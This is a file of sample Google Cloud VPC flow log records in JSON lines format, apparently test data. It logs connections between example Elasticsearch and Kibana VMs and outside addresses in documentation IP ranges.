-{"insertId":"ptjoddfhmrhgd","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"198.51.100.107","dest_port":52328,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:20.952481728Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:20.842840991Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgl","jsonPayload":{"bytes_sent":"63280","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33552},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213081491Z","packets_sent":"361","reporter":"DEST","rtt_msec":"21","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075957044Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgi","jsonPayload":{"bytes_sent":"774029","connection":{"dest_ip":"198.51.100.239","dest_port":37292,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":24940,"city":"Bucharest","continent":"Europe","country":"rou","region":"Bucharest"},"end_time":"2019-06-14T03:49:35.841633589Z","packets_sent":"403","reporter":"SRC","rtt_msec":"102","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:35.048156283Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgo","jsonPayload":{"bytes_sent":"359272","connection":{"dest_ip":"10.87.40.76","dest_port":33876,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933338264Z","packets_sent":"66","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466706102Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgp","jsonPayload":{"bytes_sent":"310476","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"198.51.100.239","src_port":37292},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:35.841633589Z","packets_sent":"214","reporter":"DEST","rtt_msec":"102","src_location":{"asn":24940,"city":"Bucharest","continent":"Europe","country":"rou","region":"Bucharest"},"start_time":"2019-06-14T03:40:35.048156283Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhg8","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"198.51.100.107","dest_port":59790,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:50.702194466Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:50.590894439Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgf","jsonPayload":{"bytes_sent":"209716","connection":{"dest_ip":"203.0.113.134","dest_port":33552,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213081491Z","packets_sent":"262","reporter":"SRC","rtt_msec":"21","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075957044Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgg","jsonPayload":{"bytes_sent":"165643","connection":{"dest_ip":"203.0.113.134","dest_port":33556,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565214145Z","packets_sent":"256","reporter":"SRC","rtt_msec":"133","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:03.062674441Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgb","jsonPayload":{"bytes_sent":"65890","connection":{"dest_ip":"203.0.113.58","dest_port":65257,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220614265Z","packets_sent":"593","reporter":"SRC","rtt_msec":"220","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.403388091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgs","jsonPayload":{"bytes_sent":"62620","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33538},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565124617Z","packets_sent":"358","reporter":"DEST","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074952616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhge","jsonPayload":{"bytes_sent":"185520","connection":{"dest_ip":"203.0.113.134","dest_port":33692,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565137912Z","packets_sent":"249","reporter":"SRC","rtt_msec":"181","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.558259934Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgc","jsonPayload":{"bytes_sent":"33269","connection":{"dest_ip":"203.0.113.58","dest_port":65262,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220741828Z","packets_sent":"517","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.251430011Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhg7","jsonPayload":{"bytes_sent":"58811","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33556},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565214145Z","packets_sent":"358","reporter":"DEST","rtt_msec":"133","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:03.062674441Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgq","jsonPayload":{"bytes_sent":"5220","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33876},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933338264Z","packets_sent":"86","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466706102Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"bxuq05fhgmw9d","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"198.51.100.182","src_port":41818},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:13.478093057Z","packets_sent":"4","reporter":"DEST","rtt_msec":"1350","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:11.031370298Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw90","jsonPayload":{"bytes_sent":"4580","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33524},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461240929Z","packets_sent":"60","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.789945697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw8w","jsonPayload":{"bytes_sent":"270437","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65322},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.408936364Z","packets_sent":"668","reporter":"DEST","rtt_msec":"92","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.703392247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw94","jsonPayload":{"bytes_sent":"19019","connection":{"dest_ip":"203.0.113.58","dest_port":65322,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:55.408936364Z","packets_sent":"604","reporter":"SRC","rtt_msec":"92","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.703392247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw8x","jsonPayload":{"bytes_sent":"16208","connection":{"dest_ip":"10.87.40.76","dest_port":33568,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789269849Z","packets_sent":"80","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.455711202Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw8v","jsonPayload":{"bytes_sent":"9800","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789269849Z","packets_sent":"120","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.455711202Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw8z","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":58026},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:09.114674887Z","packets_sent":"7","reporter":"DEST","rtt_msec":"40","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:08.995009558Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw9b","jsonPayload":{"bytes_sent":"19506","connection":{"dest_ip":"10.87.40.76","dest_port":33564,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597223164Z","packets_sent":"180","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866699945Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw8y","jsonPayload":{"bytes_sent":"1496","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":32882},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:07.811355936Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:07.689331553Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw9e","jsonPayload":{"bytes_sent":"155675","connection":{"dest_ip":"192.0.2.177","dest_port":60126,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.101129310Z","packets_sent":"288","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.019841536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw98","jsonPayload":{"bytes_sent":"1791","connection":{"dest_ip":"203.0.113.27","dest_port":32882,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:07.811355936Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:07.689331553Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw96","jsonPayload":{"bytes_sent":"28304484","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.212","src_port":39568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:02.085146013Z","packets_sent":"2400","reporter":"DEST","rtt_msec":"15","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:00.480787267Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw99","jsonPayload":{"bytes_sent":"2962242","connection":{"dest_ip":"203.0.113.212","dest_port":39568,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:02.085146013Z","packets_sent":"1340","reporter":"SRC","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.480787267Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw93","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.0.2.117","dest_port":58026,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:09.114674887Z","packets_sent":"7","reporter":"SRC","rtt_msec":"40","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:08.995009558Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw9f","jsonPayload":{"bytes_sent":"9611","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33874},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933323342Z","packets_sent":"101","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510575555Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 